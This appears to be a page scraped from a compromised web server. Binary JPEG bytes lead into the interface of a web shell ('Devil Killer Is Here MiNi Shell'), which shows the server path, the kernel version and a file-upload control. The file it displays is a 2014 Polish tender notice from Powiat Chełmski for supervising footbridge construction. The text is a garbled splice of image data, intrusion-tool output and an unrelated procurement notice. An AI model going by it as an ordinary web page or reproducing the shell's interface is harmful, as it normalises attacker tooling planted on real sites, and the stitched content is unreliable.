JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140430/145904-N-2014.html

<p class="kh_header"><b>Chełm: Pełnienie nadzoru inwestorskiego nad realizacją zadania- Budowa kładek dla pieszych</b><br>
<b>Numer ogłoszenia: 145904 - 2014; data zamieszczenia: 30.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chełmski , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 82 5627501, faks 82 5627510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chelm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad realizacją zadania- Budowa kładek dla pieszych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie pełnego nadzoru inwestorskiego nad robotami branży drogowej dotyczącymi zadania pn. Budowa kładek dla pieszych. 
W trakcie realizacji zadania inwestycyjnego Wykonawca będzie sprawował funkcję nadzoru inwestorskiego w pełnym zakresie, wynikającym z art. 25 i 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane /Dz. U. z 2013 r. poz. 14019/ oraz będzie odpowiedzialny za realizację zadania i jego rozliczenie. 
Inspektor nadzoru ma nadzorować budowę codzienne od dnia przekazania placu budowy do dnia ostatecznego odbioru robót w czasie trwania prac budowlanych związanych z realizacją zadania. Na żądanie Zamawiającego Wykonawca ma obowiązek stawienia się na placu budowy w ciągu 1 godziny od telefonicznego wezwania Wykonawcy przez Zamawiającego.

Do zadań Wykonawcy w trakcie realizacji zadania należy w szczególności:
1.Prowadzenie nadzoru nad prawidłowym przebiegiem robót zgodnie z umową. 
2.Kontrola i dopilnowanie, aby wszystkie używane urządzenia i materiały posiadały stosowne świadectwa i certyfikaty wymagane przepisami i dokumentacją projektową.
3.Sprawdzenie ważności ubezpieczeń osób zatrudnionych oraz używanego sprzętu. 
4.Kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego.
5.Rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót, a w razie potrzeby zasięganie opinii autora projektu.
6.Uczestniczenie przy prowadzeniu przez Wykonawcę robót koniecznych prób, pomiarów i sprawdzeń.
7.Egzekwowanie od Wykonawcy dodatkowych badań i pomiarów względnie przeprowadzenia badań niezależnych w przypadku wątpliwości, co do wiarygodności badań Wykonawcy.
8.Wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: wykonywania prób, wymagających odkrycia robót lub elementów zakrytych. 
9.Kontrola i odbiór robót budowlanych ulegających zakryciu lub zanikających. 
10.Zawieszenie robót budowlanych w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi bądź spowodować znaczne straty materialne.
11.Kontrola i weryfikacja wszelkich przedkładanych przez Wykonawcę dokumentów.
12.Kontrola postępu wykonywanych robót.
13.Potwierdzenie faktycznie wykonanego zakresu robót jako podstawy do wystawienia faktury  zgodnie z postanowieniami umowy zawartej między Zamawiającym i wykonawcą robót budowlanych.
14.Weryfikacja, analizowanie i zatwierdzanie do zapłaty faktur wystawionych przez Wykonawcę robót budowlanych w związku z realizacją umowy na roboty budowlane.
15.Uzgadnianie z Wykonawcą robót budowlanych rodzaju dokumentacji powykonawczej, sprawdzanie jej i zatwierdzanie w porozumieniu z Zamawiającym.
16.Uczestnictwo w komisji odbioru końcowego inwestycji oraz komisjach odbiorów gwarancyjnych, w tym prowadzenie wraz z Zamawiającym przeglądów gwarancyjnych. Zamawiający zakłada, że w okresie gwarancyjnym przynajmniej raz na rok dokonywane będą przeglądy stanu technicznego wybudowanych i przebudowanych obiektów. 
17.Zarządzanie całym procesem przekazania obiektu do użytkowania.
Zakres robót objętych nadzorem inwestorskim obejmuje:Zadanie 1 1.Budowa kładki dla pieszych nad Kanałem Horodyńskim w ciągu drogi powiatowej Nr 1863L, gmina Leśniowice 1 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, grubość warstwy do 15 cm,100 m2 2 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, dodatek za każde dalsze 5 cm grubości 100 m2 3 Wykopy oraz przekopy wykonywane koparkami przedsiębiernymi na odkład, koparka 0,25m3, grunt kategorii III,190 m3 4 Wykopy liniowe lub jamiste ze skarpami o szerokości dna do 1,5 m, głębokość do 1,5m, kategoria gruntu IV, 5m3 5 Zasypywanie wykopów fundamentowych podłużnych, punktowych, rowów, wykopów obiektowych, spycharki, grubość w stanie luźnym 30cm, kategoria gruntu III-IV, 370 m3 6 Wbijanie fundamentowych pali stalowych o średnicy 356mm z lądu, rusztowania lub pomostu na głębokość 9m, w grunt kategoria I-II, 4 szt. 7 Zbrojenie konstrukcji żelbetowych fundamentów pod maszyny, pręty gładkie, wykonanie przyczółków 0,988 t 8 Zbrojenie konstrukcji żelbetowych fundamentów pod maszyny, pręty gładkie, wykonanie płyty 0,994 t 9 Płyty fundamentowe żelbetowe, beton C30/37 w deskowaniu - zastosowaniem pompy do betonu, 5 m3 10 Betonowanie podpór beton C30/37 o gr. 60 cm, skrzydeł, ścianek i oczep pali - z zastosowaniem pompy do betonu, 4,2 m3 11 Betonowanie ustroju nośnego C30/37 o gr. 60 cm - z zastosowaniem pompy do betonu 5,5 m3 12 Podbudowy betonowe, z betonu C15/20, beton wyrównawczy 10 m2 13 Montaż dźwigarów stalowych z dwuteownika 500 - o długości 11,2 m, 3,3 t 14 Wykonanie poprzecznic stalowych z ceownika 200 l=119 cm stz.3 - stężenia ram,0,09 t 15 Balustrada stalowa U-12 24 m 16 Balustrada stalowa o wysokości 1,2m wg projektu,1,9 t 17 Izolacje powierzchni odziemnych materiałem bitumicznym izolbet na zimno wraz z oczyszczeniem podłoża, 1 warstwa, 25 m2 18 Izolacje przeciwwilgociowe powłokowe bitumiczne wykonywane izolbetem na zimno wraz z oczyszczeniem podłoża - druga warstwa,25 m2 19 Izolacje przeciwwilgociowe powłokowe bitumiczne wykonywane izolbetem na zimno wraz z oczyszczeniem podłoża - druga warstwa 25 m2 20 Zakup i montaż łożyska elastomerowe wielokierunkowo przesuwne 4 szt. 21 Czyszczenie balustrad 98,52 m2 22 Malowanie farbą olejną elementów metalowych, kraty i balustrady z prętów prostych, miniowanie, 98,52 m2 23 Mechaniczne czyszczenie konstrukcji stalowych 3611 kg 24 Miniowanie konstrukcji stalowych 3611 kg 25 Humusowanie skarp z obsianiem, przy grubości warstwy humusu 10cm,134 m2 26 Umocnienie skarp i dna rowów, płytami betonowymi ażurowymi na podsypce piaskowej115 m2 27 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, grubość warstwy do 15cm, 60 m2 28 Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników, grunt kategorii I-IV, na głębokości 20cm, 60 m2 29 Warstwy odsączające, w korycie lub na całej szerokości drogi, wykonanie i zagęszczenie mechaniczne, grubość warstwy po zagęszczeniu 10cm, 100 m2 30 Rowki pod krawężniki i ławy krawężnikowe, 20x20cm, grunt kategorii I-II, 332 m 31 Obrzeża betonowe, 30x8cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową, 332 m 32 Podbudowy z kruszyw, tłuczeń, warstwa dolna, grubość warstwy po zagęszczeniu 15cm, 45 m2 33 Chodniki z kostki brukowej betonowej grubości 60mm na podsypce cementowo-piaskowej wraz z zagęszczeniem 45 m2 34 Plantowanie wraz humusowanie skarp z obsianiem, przy grubości warstwy humusu 5cm, 34 m2 35 Nawierzchnia poliuretanowo-epoksydowa, przy grubości warstwy 5 mm 31 m2 2. Budowa kładki dla pieszych nad Rowem K-4 w ciągu drogi powiatowej Nr 1839L, gmina Leśniowice 1 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, grubość warstwy do 15 cm,100 m2 2 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, dodatek za każde dalsze 5 cm grubości 100 m2 3 Wykopy oraz przekopy wykonywane koparkami przedsiębiernymi na odkład, koparka 0,25m3, grunt kategorii III,190 m3 4 Wykopy liniowe lub jamiste ze skarpami o szerokości dna do 1,5 m, głębokość do 1,5m, kategoria gruntu IV, 5m3 5 Zasypywanie wykopów fundamentowych podłużnych, punktowych, rowów, wykopów obiektowych, spycharki, grubość w stanie luźnym 30cm, kategoria gruntu III-IV, 370 m3 6 Wbijanie fundamentowych pali stalowych o średnicy 356mm z lądu, rusztowania lub pomostu na głębokość 9m, w grunt kategoria I-II, 4 szt. 7 Zbrojenie konstrukcji żelbetowych fundamentów pod maszyny, pręty gładkie, wykonanie przyczółków 0,988 t 8 Zbrojenie konstrukcji żelbetowych fundamentów pod maszyny, pręty gładkie, wykonanie płyty 0,994 t 9 Płyty fundamentowe żelbetowe, beton C30/37 w deskowaniu - zastosowaniem pompy do betonu, 5 m3 10 Betonowanie podpór beton C30/37 o gr. 60 cm, skrzydeł, ścianek i oczep pali - z zastosowaniem pompy do betonu, 4,2 m3 11 Betonowanie ustroju nośnego C30/37 o gr. 60 cm - z zastosowaniem pompy do betonu 5,5 m3 12 Podbudowy betonowe, z betonu C15/20, beton wyrównawczy 10 m2 13 Montaż dźwigarów stalowych z dwuteownika 500 - o długości 11,2 m, 3,3 t 14 Wykonanie poprzecznic stalowych z ceownika 200 l=119 cm stz.3 - stężenia ram,0,09 t 15 Balustrada stalowa U-12 24 m 16 Balustrada stalowa o wysokości 1,2m wg projektu,1,9 t 17 Izolacje powierzchni odziemnych materiałem bitumicznym izolbet na zimno wraz z oczyszczeniem podłoża, 1 warstwa, 25 m2 18 Izolacje przeciwwilgociowe powłokowe bitumiczne wykonywane izolbetem na zimno wraz z oczyszczeniem podłoża - druga warstwa,25 m2 19 Izolacje przeciwwilgociowe powłokowe bitumiczne wykonywane izolbetem na zimno wraz z oczyszczeniem podłoża - druga warstwa 25 m2 20 Zakup i montaż łożyska elastomerowe wielokierunkowo przesuwne 4 szt. 21 Czyszczenie balustrad 98,52 m2 22 Malowanie farbą olejną elementów metalowych, kraty i balustrady z prętów prostych, miniowanie, 98,52 m2 23 Mechaniczne czyszczenie konstrukcji stalowych 3611 kg 24 Miniowanie konstrukcji stalowych 3611 kg 25 Humusowanie skarp z obsianiem, przy grubości warstwy humusu 10cm,134 m2 26 Umocnienie skarp i dna rowów, płytami betonowymi ażurowymi na podsypce piaskowej115 m2 27 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, grubość warstwy do 15cm, 60 m2 28 Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników, grunt kategorii I-IV, na głębokości 20cm, 60 m2 29 Warstwy odsączające, w korycie lub na całej szerokości drogi, wykonanie i zagęszczenie mechaniczne, grubość warstwy po zagęszczeniu 10cm, 100 m2 30 Rowki pod krawężniki i ławy krawężnikowe, 20x20cm, grunt kategorii I-II, 332 m 31 Obrzeża betonowe, 30x8cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową, 332 m 32 Podbudowy z kruszyw, tłuczeń, warstwa dolna, grubość warstwy po zagęszczeniu 15cm, 45 m2 33 Chodniki z kostki brukowej betonowej grubości 60mm na podsypce cementowo-piaskowej wraz z zagęszczeniem 45 m2 34 Plantowanie wraz humusowanie skarp z obsianiem, przy grubości warstwy humusu 5cm, 34 m2 35 Nawierzchnia poliuretanowo-epoksydowa, przy grubości warstwy 5 mm 31 m2 3. Budowa kładki dla pieszych nad rzeką Krzywólką w ciągu drogi powiatowej Nr 1839L, gmina Leśniowice 1 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, grubość warstwy do 15 cm,100 m2 2 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, dodatek za każde dalsze 5 cm grubości 100 m2 3 Wykopy oraz przekopy wykonywane koparkami przedsiębiernymi na odkład, koparka 0,25m3, grunt kategorii III,190 m3 4 Wykopy liniowe lub jamiste ze skarpami o szerokości dna do 1,5 m, głębokość do 1,5m, kategoria gruntu IV, 5m3 5 Zasypywanie wykopów fundamentowych podłużnych, punktowych, rowów, wykopów obiektowych, spycharki, grubość w stanie luźnym 30cm, kategoria gruntu III-IV, 370 m3 6 Wbijanie fundamentowych pali stalowych o średnicy 356mm z lądu, rusztowania lub pomostu na głębokość 10m, w grunt kategoria I-II, 4 szt. 7 Zbrojenie konstrukcji żelbetowych fundamentów pod maszyny, pręty gładkie, wykonanie przyczółków 0,988 t 8 Zbrojenie konstrukcji żelbetowych fundamentów pod maszyny, pręty gładkie, wykonanie płyty 0,994 t 9 Płyty fundamentowe żelbetowe, beton C30/37 w deskowaniu - zastosowaniem pompy do betonu, 5 m3 10 Betonowanie podpór beton C30/37 o gr. 60 cm, skrzydeł, ścianek i oczep pali - z zastosowaniem pompy do betonu, 4,2 m3 11 Betonowanie ustroju nośnego C30/37 o gr. 60 cm - z zastosowaniem pompy do betonu 5,5 m3 12 Podbudowy betonowe, z betonu C15/20, beton wyrównawczy 10 m2 13 Montaż dźwigarów stalowych z dwuteownika 500 - o długości 11,2 m, 3,3 t 14 Wykonanie poprzecznic stalowych z ceownika 200 l=119 cm szt..3 - stężenia ram,0,09 t 15 Balustrada stalowa U-12 24 m 16 Balustrada stalowa o wysokości 1,2m wg projektu,1,9 t 17 Izolacje powierzchni odziemnych materiałem bitumicznym izolbet na zimno wraz z oczyszczeniem podłoża, 1 warstwa, 25 m2 18 Izolacje przeciwwilgociowe powłokowe bitumiczne wykonywane izolbetem na zimno wraz z oczyszczeniem podłoża - druga warstwa,25 m2 19 Izolacje przeciwwilgociowe powłokowe bitumiczne wykonywane izolbetem na zimno wraz z oczyszczeniem podłoża - druga warstwa 25 m2 20 Zakup i montaż łożyska elastomerowe wielokierunkowo przesuwne 4 szt. 21 Czyszczenie balustrad 98,52 m2 22 Malowanie farbą olejną elementów metalowych, kraty i balustrady z prętów prostych, miniowanie, 98,52 m2 23 Mechaniczne czyszczenie konstrukcji stalowych 3611 kg 24 Miniowanie konstrukcji stalowych 3611 kg 25 Humusowanie skarp z obsianiem, przy grubości warstwy humusu 10cm,134 m2 26 Umocnienie skarp i dna rowów, płytami betonowymi ażurowymi na podsypce piaskowej115 m2 27 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, grubość warstwy do 15cm, 60 m2 28 Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników, grunt kategorii I-IV, na głębokości 20cm, 60 m2 29 Warstwy odsączające, w korycie lub na całej szerokości drogi, wykonanie i zagęszczenie mechaniczne, grubość warstwy po zagęszczeniu 10cm, 100 m2 30 Rowki pod krawężniki i ławy krawężnikowe, 20x20cm, grunt kategorii I-II, 332 m 31 Obrzeża betonowe, 30x8cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową, 332 m 32 Podbudowy z kruszyw, tłuczeń, warstwa dolna, grubość warstwy po zagęszczeniu 15cm, 45 m2 33 Chodniki z kostki brukowej betonowej grubości 60mm na podsypce cementowo-piaskowej wraz z zagęszczeniem 45 m2 34 Plantowanie wraz humusowanie skarp z obsianiem, przy grubości warstwy humusu 5cm, 34 m2 35 Nawierzchnia poliuretanowo-epoksydowa, przy grubości warstwy 5 mm 31 m2 Zadanie 2 1. Budowa kładki dla pieszych nad rzeką Rejka w ciągu drogi powiatowej Nr 3130L, gmina Rejowiec. 1 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, grubość warstwy do 15 cm,100 m2 2 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, dodatek za każde dalsze 5 cm grubości 100 m2 3 Wykopy oraz przekopy wykonywane koparkami przedsiębiernymi na odkład, koparka 0,25m3, grunt kategorii III,190 m3 4 Wykopy liniowe lub jamiste ze skarpami o szerokości dna do 1,5 m, głębokość do 1,5m, kategoria gruntu IV, 5m3 5 Zasypywanie wykopów fundamentowych podłużnych, punktowych, rowów, wykopów obiektowych, spycharki, grubość w stanie luźnym 30cm, kategoria gruntu III-IV, 370 m3 6 Wbijanie fundamentowych pali stalowych o średnicy 356mm z lądu, rusztowania lub pomostu na głębokość 9m, w grunt kategoria I-II, 4 szt. 7 Zbrojenie konstrukcji żelbetowych fundamentów pod maszyny, pręty gładkie, wykonanie przyczółków 0,988 t 8 Zbrojenie konstrukcji żelbetowych fundamentów pod maszyny, pręty gładkie, wykonanie płyty 0,994 t 9 Płyty fundamentowe żelbetowe, beton C30/37 w deskowaniu - zastosowaniem pompy do betonu, 5 m3 10 Betonowanie podpór beton C30/37 o gr. 60 cm, skrzydeł, ścianek i oczep pali - z zastosowaniem pompy do betonu, 4,2 m3 11 Betonowanie ustroju nośnego C30/37 o gr. 60 cm - z zastosowaniem pompy do betonu 5,5 m3 12 Podbudowy betonowe, z betonu C15/20, beton wyrównawczy 10 m2 13 Montaż dźwigarów stalowych z dwuteownika 500 - o długości 11,2 m, 3,3 t 14 Wykonanie poprzecznic stalowych z ceownika 200 l=119 cm szt.3 - stężenia ram,0,09 t 15 Balustrada stalowa U-12 24 m 16 Balustrada stalowa o wysokości 1,2m wg projektu,1,9 t 17 Izolacje powierzchni odziemnych materiałem bitumicznym izolbet na zimno wraz z oczyszczeniem podłoża, 1 warstwa, 25 m2 18 Izolacje przeciwwilgociowe powłokowe bitumiczne wykonywane izolbetem na zimno wraz z oczyszczeniem podłoża - druga warstwa,25 m2 19 Izolacje przeciwwilgociowe powłokowe bitumiczne wykonywane izolbetem na zimno wraz z oczyszczeniem podłoża - druga warstwa 25 m2 20 Zakup i montaż łożyska elastomerowe wielokierunkowo przesuwne 4 szt. 21 Czyszczenie balustrad 98,52 m2 22 Malowanie farbą olejną elementów metalowych, kraty i balustrady z prętów prostych, miniowanie, 98,52 m2 23 Mechaniczne czyszczenie konstrukcji stalowych 3611 kg 24 Miniowanie konstrukcji stalowych 3611 kg 25 Humusowanie skarp z obsianiem, przy grubości warstwy humusu 10cm,134 m2 26 Umocnienie skarp i dna rowów, płytami betonowymi ażurowymi na podsypce piaskowej115 m2 27 Usunięcie warstwy ziemi urodzajnej (humusu) za pomocą spycharek, grubość warstwy do 15cm, 60 m2 28 Mechaniczne wykonanie koryta na całej szerokości jezdni i chodników, grunt kategorii I-IV, na głębokości 20cm, 60 m2 29 Warstwy odsączające, w korycie lub na całej szerokości drogi, wykonanie i zagęszczenie mechaniczne, grubość warstwy po zagęszczeniu 10cm, 100 m2 30 Rowki pod krawężniki i ławy krawężnikowe, 20x20cm, grunt kategorii I-II, 332 m 31 Obrzeża betonowe, 30x8cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementową, 332 m 32 Podbudowy z kruszyw, tłuczeń, warstwa dolna, grubość warstwy po zagęszczeniu 15cm, 45 m2 33 Chodniki z kostki brukowej betonowej grubości 60mm na podsypce cementowo-piaskowej wraz z zagęszczeniem 45 m2 34 Plantowanie wraz humusowanie skarp z obsianiem, przy grubości warstwy humusu 5cm, 34 m2 35 Nawierzchnia poliuretanowo-epoksydowa, przy grubości warstwy 5 mm 31 m2 
Roboty towarzyszące: wykonanie inwentaryzacji geodezyjnej powykonawczej.

Szczegółowy zakres robót i warunki realizacji określa dokumentacja techniczna, tj. w szczególności:
1.Projekt budowlano- wykonawczy.
2.Przedmiar robót.
3.Szczegółowa specyfikacja techniczna wykonania i odbioru robót.
4.Projekt stałej organizacji ruchu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywane główne usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie. Warunek będzie spełniony, gdy Wykonawca dowiedzie, że wśród wykazanych usług znajduje się co najmniej 1 usługa polegająca na nadzorze inwestorskim nad robotami branży drogowej i mostowej w zakresie budowy /przebudowy/ remontu obiektów mostowych, kładek dla pieszych lub przepraw</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie osobami: 1 osobą do pełnienia funkcji Inspektora nadzoru inwestorskiego posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności mostowej lub im odpowiadające, właściwe do kierowania robotami z zakresu branży mostowej stanowiącymi przedmiot zamówienia.
UWAGA! Zamawiający określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jedn. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
